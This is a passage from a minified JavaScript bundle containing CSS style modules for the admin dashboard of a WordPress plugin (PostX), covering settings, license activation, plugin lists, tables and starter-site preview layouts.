ease-in-out infinite;margin-right:5px;font-size:20px;position:relative;top:2px;color:#fff}.helobarClose{position:absolute;cursor:pointer;right:15px}.helobarClose svg{height:16px;color:#fff}@keyframes ring{0%{transform:rotate(0)}1%{transform:rotate(30deg)}3%{transform:rotate(-28deg)}5%{transform:rotate(34deg)}7%{transform:rotate(-32deg)}9%{transform:rotate(30deg)}11%{transform:rotate(-28deg)}13%{transform:rotate(26deg)}15%{transform:rotate(-24deg)}17%{transform:rotate(22deg)}19%{transform:rotate(-20deg)}21%{transform:rotate(18deg)}23%{transform:rotate(-16deg)}25%{transform:rotate(14deg)}27%{transform:rotate(-12deg)}29%{transform:rotate(10deg)}31%{transform:rotate(-8deg)}33%{transform:rotate(6deg)}35%{transform:rotate(-4deg)}37%{transform:rotate(2deg)}39%{transform:rotate(-1deg)}41%{transform:rotate(1deg)}43%{transform:rotate(0)}100%{transform:rotate(0)}}",""]);const l=i},283:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp_h1{font-size:var(--postx-h1-fontsize);font-weight:var(--postx-h1-weight)}.ultp_h2{font-size:var(--postx-h2-fontsize);font-weight:var(--postx-h2-weight)}.ultp_h3{font-size:var(--postx-h3-fontsize);font-weight:var(--postx-h3-weight)}.ultp_h4{font-size:var(--postx-h4-fontsize);font-weight:var(--postx-h4-weight)}.ultp_h5{font-size:var(--postx-h5-fontsize);font-weight:var(--postx-h5-weight)}.ultp_h6{font-size:var(--postx-h6-fontsize);font-weight:var(--postx-h6-weight)}.ultp_h1,.ultp_h2,.ultp_h3,.ultp_h4,.ultp_h5,.ultp_h6{color:#091f36}.ultp-settings-container{margin:0 !important;background:#f6f8fa;padding:32px;min-height:100vh;height:100%}.ultp-settings-container .ultp-settings-content .ultp-premade-grid{background:#f6f8fa}@media screen and (max-width: 1250px){.ultp-settings-container{padding:12px}}.ultp-settings-content{margin:0 auto 40px !important;max-width:1376px}@media screen and (max-width: 768px){.ultp-settings-content{max-width:100%;overflow:scroll}}.ultp-dash-item-con{background:#fff;padding:12px;border-radius:8px;box-shadow:0 2px 4px 0 rgba(27,28,29,.0392156863)}.ultp-setting-header{display:grid;align-items:center;grid-template-columns:148px 502px auto 72px;gap:16px;background:var(--postx-white-color);border-bottom:1px solid var(--postx-border-color);padding:0 32px;position:sticky;top:32px;width:100%;height:67px;min-height:67px;box-sizing:border-box;z-index:99}@media screen and (max-width: 1200px){.ultp-setting-header{grid-template-columns:152px auto;background-color:#fff;gap:32px;height:auto;padding-top:12px;column-gap:38px;box-shadow:0px 0px 11px rgba(0,0,0,.168627451)}}@media screen and (max-width: 768px){.ultp-setting-header{display:flex;flex-wrap:wrap;padding:8px;height:auto}}.ultp-setting-hellobar{position:relative;background:#027fff;padding:6px 0;text-align:center;color:rgba(255,255,255,.85);font-size:14px}.ultp-setting-hellobar a{margin-left:4px;font-weight:700;color:#fff}.ultp-setting-hellobar strong{color:#fff}.helobarClose{position:absolute;top:50%;right:15px;transform:translateY(-50%);cursor:pointer}.helobarClose svg{height:10px;color:rgba(255,255,255,.43)}.ultp-pro-feature-lists{display:flex;flex-direction:column;gap:15px;margin-top:24px}.ultp-pro-feature-lists>span{display:inline-flex;gap:8px;align-items:center}.ultp-pro-feature-lists>span,.ultp-pro-feature-lists>span>span{color:#070707;font-weight:500;font-size:14px;line-height:20px}.ultp-pro-feature-lists>span>span>a{text-decoration:none}.ultp-pro-feature-lists>span>span>a .dashicons{color:var(--postx-primary-color);font-size:17px;line-height:1.2}.ultp-pro-feature-lists>span svg{height:16px;width:16px;vertical-align:middle;color:#070707;flex-shrink:0}.settingsLink{color:var(--postx-primary-color) !important}.ultp-ring{display:inline-block;margin-right:5px;font-size:20px;position:relative;top:2px;color:#fff;animation:ring 2s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite}@keyframes ring{0%{transform:rotate(0)}5%{transform:rotate(25deg)}10%{transform:rotate(-20deg)}15%{transform:rotate(12deg)}20%{transform:rotate(-6deg)}25%{transform:rotate(2deg)}28%,100%{transform:rotate(0)}}#postx-regenerate-css{display:none;margin-top:10px}#postx-regenerate-css span{color:var(--postx-white-color)}#postx-regenerate-css.active{display:inline-block}#postx-regenerate-css .dashicons{display:none;margin-right:8px;-webkit-animation:ultp-spin 1s linear infinite;animation:ultp-spin 1s linear infinite}#postx-regenerate-css.ultp-spinner .dashicons{display:inline-block}@keyframes ultp-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}form .ultp-settings-wrap{display:flex;flex-direction:column;gap:12px;margin-bottom:30px}form .ultp-settings-wrap strong{font-size:14px;color:#091f36;font-weight:500}form .ultp-settings-wrap .ultp-settings-field-wrap select,form .ultp-settings-wrap .ultp-settings-field-wrap input[type=text],form .ultp-settings-wrap .ultp-settings-field-wrap input[type=number]{height:36px;width:100%;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:0px 13px 0px;background-color:#fff;margin-bottom:3px}form .ultp-settings-wrap .ultp-settings-field-wrap textarea{width:100%;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:0px 13px 0px;background-color:#fff;margin-bottom:3px}form .ultp-settings-wrap .ultp-settings-field-wrap select[multiple]{max-height:100px;height:100%}form .ultp-settings-wrap .ultp-settings-field-wrap .ultp-description{font-size:12px}form .ultp-data-message{display:none;position:fixed;bottom:10%;padding:13px 14px 14px 15px;border-radius:4px;box-shadow:0 1px 2px 0 rgba(8,68,129,.2);background:rgba(115,184,28,.1);width:224px;color:#091f36}.ultp-upgrade-pro-btn{display:inline-block;padding:10px 25px;color:#fff;font-size:14px;background:linear-gradient(180deg, #ff9336, transparent) #de521e;border-radius:4px;text-decoration:none;width:fit-content;transition:background-color 400ms}.ultp-upgrade-pro-btn:hover{background-color:#ff9336;color:#fff}.ultp-upgrade-pro-btn:focus{outline:0;box-shadow:none}.ultp-upgrade-pro-btn:active{color:#fff}input[type=checkbox]{width:22px;height:20px;border-radius:2px;border:solid 1px #eaedf2;background:#fff;position:relative;margin:0;box-shadow:none;display:inline-block}input[type=checkbox]+.ultp-description{margin-left:10px}input[type=checkbox]:checked{background:var(--postx-primary-color);border:none}input[type=checkbox]:checked::before{content:"✓";color:#fff;height:unset;width:unset;margin:unset;position:absolute;left:5px;top:9px;font-weight:900}.ultp-primary-button{cursor:pointer;padding:12px 25px;color:#fff !important;font-size:14px;background:#070707;border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;border:none;transition:background-color 400ms;gap:8px;line-height:20px}.ultp-primary-button:hover{background-color:var(--postx-primary-color)}.ultp-primary-button:focus{outline:0;box-shadow:none}.ultp-secondary-button{cursor:pointer;padding:10px 25px;color:#070707;font-size:14px;background:rgba(0,0,0,0);border-radius:4px;text-decoration:none;border:1px solid #070707;display:inline-flex;align-items:center;width:fit-content;transition:background-color 400ms}.ultp-secondary-button:hover{background-color:#dee5fa}.ultp-secondary-button:focus{outline:0;box-shadow:none}.ultp-primary-alter-button{cursor:pointer;padding:12px 24px;color:#fff !important;font-size:14px;background:var(--postx-primary-color);border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;border:none;transition:background-color 400ms;gap:8px;line-height:20px}.ultp-primary-alter-button:hover{background-color:#070707}.ultp-primary-alter-button:focus{outline:0;box-shadow:none}.ultp-transparent-button{cursor:pointer;color:#a1a1a1 !important;font-size:14px;background:rgba(0,0,0,0);border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;transition:background-color 400ms;gap:8px}.ultp-transparent-button:hover{text-decoration:underline}.ultp-transparent-button:focus{outline:0;box-shadow:none}.ultp-transparent-alter-button{cursor:pointer;color:#4a4a4a;font-size:14px;background:rgba(0,0,0,0);text-decoration:underline;display:flex;align-items:center;width:fit-content;transition:background-color 400ms;gap:8px}.ultp-transparent-alter-button:hover{color:#3c3c3c}.ultp-transparent-alter-button:focus{outline:0;box-shadow:none}.ultp-primary-button svg,.ultp-primary-alter-button svg,.ultp-secondary-button svg,.ultp-transparent-button svg,.ultp-transparent-alter-button svg{width:24px;height:24px}.cursor{cursor:pointer}#wpbody-content:has(.ultp-menu-items-wrap){padding:0 !important;background-color:#f6f8fa}.ultp-menu-items-wrap{line-height:1.6}.ultp-menu-items-wrap h1,.ultp-menu-items-wrap h2,.ultp-menu-items-wrap h3,.ultp-menu-items-wrap h4,.ultp-menu-items-wrap h5,.ultp-menu-items-wrap h6{padding:0;margin:0}.ultp-menu-items-wrap .ultp-discount-wrap{transform:rotate(-90deg);width:150px;height:40px;display:flex;gap:10px;align-items:center;justify-content:center;border-radius:4px 4px 0 0;position:fixed;top:200px;right:-55px;z-index:99999;text-decoration:none;background:linear-gradient(60deg, hsl(224, 88%, 61%), hsl(359, 85%, 66%), hsl(44, 74%, 55%), hsl(89, 72%, 47%), hsl(114, 79%, 48%), hsl(179, 85%, 66%));background-size:300% 300%;background-position:0 50%;animation:ultp_moveGradient 4s alternate infinite;transition:.4s}.ultp-menu-items-wrap .ultp-discount-wrap .ultp-discount-text{font-weight:600;color:#fff;text-transform:uppercase;font-size:14px}@keyframes ultp_moveGradient{50%{background-position:100% 50%}}.ultp-ml-auto{margin-left:auto}.ultp-dash-control-options .ultp-addons-enable,.ultp-dash-control-options .ultp-blocks-enable{width:0;height:0;display:none}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label{position:relative;background-color:var(--postx-primary-color);opacity:unset}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label>span,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label>span{display:none}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label::after,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label::after{left:calc(100% - 3px);transform:translateX(-100%)}.ultp-dash-control-options .ultp-addons-enable.disabled+.ultp-control__label,.ultp-dash-control-options .ultp-blocks-enable.disabled+.ultp-control__label{opacity:.25 !important}.ultp-dash-control-options>label{width:36px;height:18px;display:block;cursor:pointer;border-radius:100px;text-indent:-9999px;background:#d2d2d2;opacity:1;position:relative}.ultp-dash-control-options>label::after{content:"";position:absolute;top:3px;left:3px;width:12px;height:12px;border-radius:90px;background:var(--postx-white-color);transition:.3s}.rotate{animation:rotate 1.5s linear infinite}@keyframes rotate{to{transform:rotate(360deg)}}.ultp-setting-logo{display:flex;gap:4px;align-items:center;border-right:1px solid #e2e4e9;height:100%;width:100%;max-width:152px}@media screen and (max-width: 1300px){.ultp-setting-logo{padding-right:11px}}@media screen and (max-width: 768px){.ultp-setting-logo{border-right:none}}.ultp-setting-logo .ultp-setting-header-img{height:26px}.ultp-setting-logo .ultp-setting-version{font-size:14px;border:1px solid var(--postx-primary-color);border-radius:100px;padding:7px 11px;background:#edf6ff;color:var(--postx-primary-color);line-height:18px;font-weight:500}.ultp-menu-items{display:flex;gap:24px}@media screen and (max-width: 1200px){.ultp-menu-items{margin-top:-9px}}@media screen and (max-width: 768px){.ultp-menu-items{flex-wrap:wrap;gap:16px}}.ultp-menu-item{position:relative;text-decoration:none;font-size:14px;padding:0;color:#070707;position:relative;display:flex;gap:8px;font-weight:500;align-items:center;transition:400ms;white-space:nowrap}.ultp-menu-item:hover{color:#1f66ff}.ultp-menu-item:focus{outline:none;box-shadow:none}.ultp-menu-item:after{content:"";position:absolute;bottom:-21px;width:100%;height:2px;background:var(--postx-primary-color);left:0;opacity:0}@media only screen and (max-width: 1250px){.ultp-menu-item:after{bottom:-9px}}.ultp-menu-item svg{width:20px;height:20px;color:#1f66ff}.ultp-menu-item.current{color:var(--postx-primary-color)}.ultp-menu-item.current:after{opacity:1}.ultp-menu-item .ultp-menu-item-tag{position:absolute;top:-14px;right:-20px;background:#fdedf0;border-radius:100px;padding:2px 6px;font-size:10px;font-weight:500;color:#dc2671;animation:ultpMenuTagColor 2s ease-in-out infinite}@keyframes ultpMenuTagColor{0%{background-color:#f8d7dd}50%{background-color:#fdedf0}100%{background-color:#f8d7dd}}.ultp-menu-items div a:active,.ultp-menu-items div a:focus{outline:none;box-shadow:none;border:none}.ultp-secondary-menu{display:flex;align-items:center;gap:8px;justify-content:space-between;padding:12px 0 12px 16px;border-left:1px solid var(--postx-border-color);height:-webkit-fill-available}@media screen and (max-width: 1300px){.ultp-secondary-menu{padding-left:0px !important;width:fit-content;border:0px !important}}@media screen and (max-width: 768px){.ultp-secondary-menu{border-left:none;padding:0}}.ultp-secondary-menu .ultp-pro-button{background-color:#edf6ff;color:#1f66ff !important;border:1px solid #1f66ff;padding:8px 20px;font-weight:500;font-size:16px;text-wrap:nowrap;display:flex;align-items:center;gap:8px}@media screen and (max-width: 768px){.ultp-secondary-menu .ultp-pro-button{padding:4px 8px}}.ultp-secondary-menu .ultp-pro-button svg{width:24px;height:24px;color:#1f66ff}.ultp-secondary-menu .ultp-pro-button:hover{background-color:#1f66ff;color:#fff !important}.ultp-secondary-menu .ultp-pro-button:hover svg{color:#fff}ul:has(.ultp-dash-faq-icon){position:relative}.ultp-dash-faq-con{height:100%;border-left:1px solid var(--postx-border-color);display:flex;align-items:center;justify-content:center;position:relative}@media screen and (max-width: 1200px){.ultp-dash-faq-con{width:fit-content;margin-left:0px !important;padding-left:2%}}@media screen and (max-width: 768px){.ultp-dash-faq-con{border-left:none;margin:0px;position:relative}}.ultp-dash-faq-icon{height:auto;width:auto;font-size:35px;cursor:pointer}.ultp-ms-container{position:relative}.ultp-ms-container .ultp-ms-results-con{min-height:30px;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:8px 14px;background-color:#fff;margin-bottom:3px;display:flex;gap:10px;justify-content:space-between}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results{display:flex;gap:8px;flex-wrap:wrap}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected{padding:4px 8px;border-radius:2px;background-color:#7c8084;color:#fff;display:inline-flex;align-items:center;gap:6px}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove{height:16px;width:14px}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove:hover svg{color:var(--postx-primary-color)}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove svg{color:#fff}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results-collapse{height:12px;width:12px;display:inline-block}.ultp-ms-container .ultp-ms-options{display:flex;flex-direction:column;gap:5px;z-index:1;position:absolute;width:100%;box-sizing:border-box;margin-top:4px;border:1px solid #eaedf2;box-shadow:0 1px 2px 0 rgba(8,68,129,.2);border-radius:4px;color:#000;padding:8px 14px;background-color:#fff;margin-bottom:3px}.ultp-ms-container .ultp-ms-options .ultp-ms-option{padding:4px 8px;border-radius:2px}.ultp-ms-container .ultp-ms-options .ultp-ms-option:hover{background-color:#7c8084;color:#fff}.ultp-field-radio .ultp-field-radio-items{display:flex;gap:20px;flex-wrap:wrap}.ultp-field-radio .ultp-field-radio-items input[type=radio]:checked::before{background-color:var(--postx-primary-color)}.ultp-sidebar-features{display:flex;flex-direction:column;gap:32px}.ultp-sidebar-card-item{border-radius:8px;padding:24px;display:flex;flex-direction:column;box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863);background-color:#fff}@media only screen and (max-width: 1250px){.ultp-sidebar-card-item{padding:16px}}.ultp-sidebar-card-item:has(.ultp-sidebar-card-title) img{margin-bottom:20px}.ultp-sidebar-card-item .ultp-sidebar-card-title{font-weight:600;font-size:18px;line-height:24px;color:#0a0d14}.ultp-sidebar-card-item .ultp-sidebar-card-description{font-size:14px;line-height:20px;color:#4a4a4a;margin-top:16px}.ultp-sidebar-card-item .ultp-primary-button,.ultp-sidebar-card-item .ultp-secondary-button,.ultp-sidebar-card-item .ultp-primary-alter-button,.ultp-sidebar-card-item .ultp-transparent-alter-button{padding:10px 24px;display:flex;align-items:center;gap:8px;margin-top:20px}.ultp-sidebar-card-item .ultp-primary-button svg,.ultp-sidebar-card-item .ultp-secondary-button svg,.ultp-sidebar-card-item .ultp-primary-alter-button svg,.ultp-sidebar-card-item .ultp-transparent-alter-button svg{width:20px;height:20px}.ultp-sidebar-card-item .ultp-sidebar-card-buttons{margin-top:24px}.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-primary-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-secondary-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-primary-alter-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-transparent-alter-button{margin-top:0}.ultp-sidebar-card-item .ultp-sidebar-card-links{display:flex;gap:16px;flex-direction:column;margin-top:24px}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link{text-decoration:none;color:#000;font-size:16px;font-weight:400;display:flex;align-items:center;gap:12px;line-height:normal}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link:hover{text-decoration:underline}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link span{display:flex}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link svg{width:24px;height:24px;color:#1f66ff}.ultp-sidebar-card-item .ultp-sidebar-card-buttons{display:flex;gap:20px;align-items:center}',""]);const l=i},4421:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp-license{--brand-color: #037fff;--brand-color-fade: #f0f7ff;max-width:1600px;padding:32px !important;display:flex;margin:0 auto !important;gap:32px}.ultp-license__activation{background-color:#fff;padding:32px !important;box-shadow:0px 2px 4px 0px rgba(91,95,88,.078);max-width:890px;width:60%}.ultp-license__title{margin-bottom:32px !important;color:#000;font-size:24px;line-height:1.2em;font-weight:600}.ultp-license__form{margin-bottom:30px !important}.ultp-license__form input{width:100%;padding:0 8px;color:#000 !important;border-radius:4px !important;max-height:40px !important;border-color:currentColor !important}.ultp-license__helper-text{font-size:12px;color:#80837f;margin-top:8px !important}.ultp-license__renew-link{display:flex;align-items:center;gap:6px;color:#fff;background-color:#f17b2c;border-radius:6px;box-shadow:none;padding:4px 8px;cursor:pointer;text-decoration:none;margin-left:12px}.ultp-license__renew-link:hover{color:#fff}.ultp-license__link{color:var(--brand-color)}.ultp-license__status-messages{display:flex;flex-direction:column;gap:30px;margin-top:48px !important;margin-bottom:48px !important}.ultp-license__status-message{display:flex;align-items:center;font-size:14px}.ultp-license__status-message-label{text-align:left;color:#000;width:133px}.ultp-license__status-message-value{color:#000;text-align:left}.ultp-license__status-message-value::before{content:":";margin-right:33px !important;color:#000}.ultp-license__faq{max-width:567px;width:40%;padding-left:32px !important;border-left:1px solid #d5dad4}.ultp_license_action_btn{display:flex;gap:10px;margin-left:auto;margin-top:32px !important;text-transform:none;text-decoration:none;justify-content:center;font-size:14px;font-weight:500;border-radius:4px;background-color:var(--brand-color);width:fit-content;padding:10px 20px !important;color:#fff;cursor:pointer}.ultp-activate-loading{--loader-size: 22px;--loader-thickness: 3px;--loader-brand-color: #ffffff;width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:ultp-activate-loading 1s infinite linear}@keyframes ultp-activate-loading{100%{transform:rotate(1turn)}}.ultp-license-faq__item{margin-bottom:32px !important}.ultp-license-faq__question{text-align:left;color:#000;font-size:24px;font-weight:600;line-height:1.3em}.ultp-license-faq__answer{text-align:left;color:#262a25;margin-top:8px !important;font-size:14px}.ultp-license-message{display:flex;align-items:flex-start;background-color:var(--brand-color-fade);border:1px solid var(--brand-color);border-radius:8px;padding:24px !important}.ultp-license-message__icon{color:var(--brand-color);font-size:24px;margin-right:16px !important}.ultp-license-message__content{flex:1}.ultp-license-message__title{color:#0b0e04;margin-top:-8px !important;margin-bottom:8px !important}.ultp-license-message__text{text-align:left;color:#0b0e04;font-size:14px}.ultp-license-message-congrats{font-size:24px;font-weight:600}.ultp-custom-skeleton-loader{background:linear-gradient(90deg, #eee 25%, #ddd 50%, #eee 75%);background-size:200% 100%;animation:ultp-custom-skeleton-anim 4s infinite;display:inline-block}@keyframes ultp-custom-skeleton-anim{0%{background-position:200% 0}100%{background-position:-200% 0}}.ultp-license__upgrade-message{display:flex;gap:12px;align-items:end}.ultp-license__upgrade-message .ultp-license__upgrade-message-title{display:flex;flex-direction:column;gap:4px}.ultp-license__upgrade-message .ultp-license__upgrade-message-title select{min-height:36px;width:100%;max-width:100%}.ultp-license__upgrade-message .ultp-license__upgrade-link{color:#fff;background-color:var(--brand-color);text-decoration:none;font-weight:500;font-size:14px;padding:8px 16px;border-radius:4px}',""]);const l=i},2041:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-plugins-wrapper{background-color:var(--postx-h1-fontsize)}.ultp-plugin-items{display:grid;grid-template-columns:repeat(4, 1fr);gap:32px}@media only screen and (max-width: 1200px){.ultp-plugin-items{grid-template-columns:repeat(2, 1fr)}}@media only screen and (max-width: 425px){.ultp-plugin-items{grid-template-columns:repeat(1, 1fr)}}.ultp-plugin-items .ultp-plugin-item{padding:24px;background:#fff;box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863);border-radius:8px;display:flex;gap:12px;flex-direction:column}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-title{display:flex;align-items:center;gap:16px;font-weight:600;font-size:18px;line-height:24px;color:#070707}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-title img{width:40px;height:40px}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-desc{font-weight:400;font-size:14px;line-height:20px;color:#4a4a4a}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action{display:flex;align-items:center;gap:20px}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-secondary-button{padding:10px 24px;font-weight:500}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-secondary-button:hover{background-color:#070707;color:#fff}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-transparent-alter-button{color:#070707;font-weight:500}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-activated-button{background-color:#fff;color:#1f66ff;border:1px solid #1f66ff;cursor:not-allowed}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-activated-button:hover{background-color:#fff;color:#1f66ff}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-active-btn{gap:10px}.ultp-plugin-items .ultp-plugin-item-loading{--loader-size: 18px;--loader-thickness: 3px;--loader-brand-color: var(--postx-primary-color);width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:ultp-install-loading 1s infinite linear}@keyframes ultp-install-loading{100%{transform:rotate(1turn)}}",""]);const l=i},6657:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultpPages li.active{color:#ee0404}.tableCon{margin-top:30px;border-radius:4px;box-shadow:0 1px 2px 0 rgba(8,68,129,.2)}.ultp-bulk-con{display:flex;justify-content:space-between;border-radius:4px 4px 0 0 !important;box-shadow:unset !important;flex-wrap:wrap;gap:20px}.ultp-bulk-con>div{display:flex;gap:15px}.ultp-bulk-con select,.ultp-bulk-con input{max-height:35px}.ultp-bulk-con .ultp-primary-button{padding:6px 15px}.ultp-bulk-con input[type=text],.ultp-bulk-con select{border:1px solid #eaedf2;padding-left:12px}.ultp-bulk-con input[type=text]:focus,.ultp-bulk-con select:focus{box-shadow:none;outline:0;border:1px solid var(--postx-primary-color)}.pageCon{display:flex;justify-content:space-between;border-radius:0 0 4px 4px;padding:22px 25px;background:#fff}.pageCon .ultpPages{display:flex;gap:12px}.pageCon .ultpPages .currentPage{background:#000;border-radius:50%;font-size:14px;color:var(--postx-white-color);height:25px;width:25px;text-align:center}.pageCon .ultpPages span:not(.currentPage){cursor:pointer;display:flex;align-items:center}.pageCon .ultpPages span:not(.currentPage) svg{height:14px;width:14px}.shortCode{cursor:copy;position:relative}.shortCode span{background:rgba(0,0,0,.7);color:#fff;border-radius:6px;position:absolute;left:calc(100% + 6px);padding:2px 6px}th.title{width:220px}th.fontType{width:65px}th.fontpreview{width:300px}.fontType{text-align:center}.actions{position:relative}.actions .dashicons{cursor:pointer}.actions .actionPopUp{position:absolute;width:130px;right:0;text-align:left;padding:10px;z-index:1}.actions .actionPopUp li{cursor:pointer;margin-bottom:8px;padding:0 6px}.actions .actionPopUp li a{display:block;text-decoration:none}.actions .actionPopUp li:hover{background:rgba(3,127,255,.04);border-radius:4px}.actions .actionPopUp li .dashicons{font-size:16px;margin-right:5px}.ultpTable{width:100%}.ultpTable table{width:100%;border-spacing:0px}.ultpTable table thead tr{background:rgba(3,127,255,.04)}.ultpTable table thead tr th{font-size:14px;border-bottom:1px solid #e7eef7;border-top:1px solid #e7eef7;padding:15px 0px;color:#091f36}.ultpTable table th:first-child,.ultpTable table td:first-child{padding-left:25px;padding-right:12px;width:55px}.ultpTable table th:last-child,.ultpTable table td:last-child{text-align:center;padding-right:25px}.ultpTable table tbody{background:#fff}.ultpTable table tbody .dashicons{vertical-align:middle}.ultpTable table tbody tr td{border-bottom:1px solid #eaedf2;padding:15px 0px;color:#575a5d;font-size:14px}.ultpTable table tbody tr td.title a{color:var(--postx-primary-color)}.ultpTable table tbody tr td.typeDate{text-transform:capitalize}@media only screen and (max-width: 1350px){.ultpTable{overflow-x:auto}.ultpTable table{width:1200px}}",""]);const l=i},2793:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-addon-lock-container{position:fixed;top:20%;z-index:999;background:#fff;padding:40px 100px;border-radius:4px;box-shadow:0 50px 99px 0 rgba(62,51,51,.5)}.ultp-addon-lock-container .ultp-popup-unlock{display:flex;flex-direction:column;align-items:center;justify-content:center;max-width:300px;width:100%;width:100%;gap:20px}.ultp-addon-lock-container .ultp-popup-unlock .title{text-align:center}.ultp-addon-lock-container .ultp-popup-unlock img{height:112px}.ultp-addon-lock-container .ultp-popup-unlock .ultp-description{text-align:center}.ultp-addon-lock-container .ultp-popup-close{position:absolute;font-size:0px;top:0;right:-10%;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff}.ultp-addon-lock-container .ultp-popup-close:hover{background:red}.ultp-addon-lock-container .ultp-popup-close:hover svg{color:#fff}.ultp-addon-lock-container-overlay{background:rgba(0,0,0,.7);position:absolute;right:0;height:100%;width:100%;z-index:999;top:0;display:flex;justify-content:center}",""]);const l=i},4558:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp-settings-container.ultp-settings-container-startersites{padding-top:0;padding-left:0;padding-right:0}.ultp-settings-container.ultp-settings-container-startersites .ultp-settings-content{max-width:100%}.ultp-settings-container.ultp-settings-container-startersites .ultp-premade-grid{max-width:1376px;margin:0 auto;padding-left:30px;padding-right:30px}#ultp-starter-preview.mobileView,#ultp-starter-preview.tabletView{box-shadow:#828282 0px 0px 12px -3px;border-radius:8px 8px 0px 0px;margin-top:24px}.ultp_starter_packs_demo .wp-full-overlay-sidebar{width:300px !important}.ultp_starter_packs_demo.expanded .wp-full-overlay-footer{width:299px !important}.ultp_starter_packs_demo .wp-full-overlay-main::before{content:unset}.ultp_starter_packs_demo.wp-full-overlay.expanded{margin-left:300px !important}.ultp_starter_packs_demo.inactive.expanded{margin-left:0 !important}.ultp_starter_packs_demo.inactive.expanded .wp-full-overlay-sidebar,.ultp_starter_packs_demo.inactive.expanded .wp-full-overlay-footer{margin-left:-300px !important}.ultp_starter_packs_demo .ultp_starter_packs_demo_header{display:flex;justify-content:space-between;padding-right:12px;padding-left:12px;align-items:center;height:100%}.ultp_starter_packs_demo .ultp_starter_packs_demo_header .packs_title{font-size:14px}.ultp_starter_packs_demo .ultp-starter-packs-device-container{display:flex;gap:10px;line-height:normal;align-items:center;justify-content:center}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device{border:1px solid rgba(0,0,0,0);height:14px;padding:2px;transition:400ms}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device svg{width:15px;cursor:pointer;color:#091f36;opacity:.5}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device.d-active{border:1px solid #091f36;border-radius:2px}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device.d-active svg{opacity:1}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device:hover svg{opacity:1}.ultp_starter_packs_demo .close-full-overlay{margin-left:12px;border:none;padding:0;width:auto}.ultp_starter_packs_demo 